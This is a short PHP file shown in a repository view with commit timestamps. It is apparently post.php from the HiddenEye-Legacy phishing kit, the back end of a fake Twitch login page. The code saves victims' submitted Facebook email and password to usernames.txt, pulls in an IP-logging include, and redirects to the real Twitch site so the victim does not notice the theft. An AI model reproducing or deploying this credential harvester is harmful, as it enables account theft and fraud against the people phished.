HiddenEye-Legacy/WebPages/twitch/post.php

7 lines
203 B
PHP
Raw Normal View History

<?php
2018-06-07 17:23:56 +08:00
include 'ip.php';
2018-04-28 10:59:36 +08:00
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $_POST['fb_email'] . " [FB-PASS]: " . $_POST['fb_pass'] . "\n", FILE_APPEND);
header('Location: https://twitch.tv/');
exit();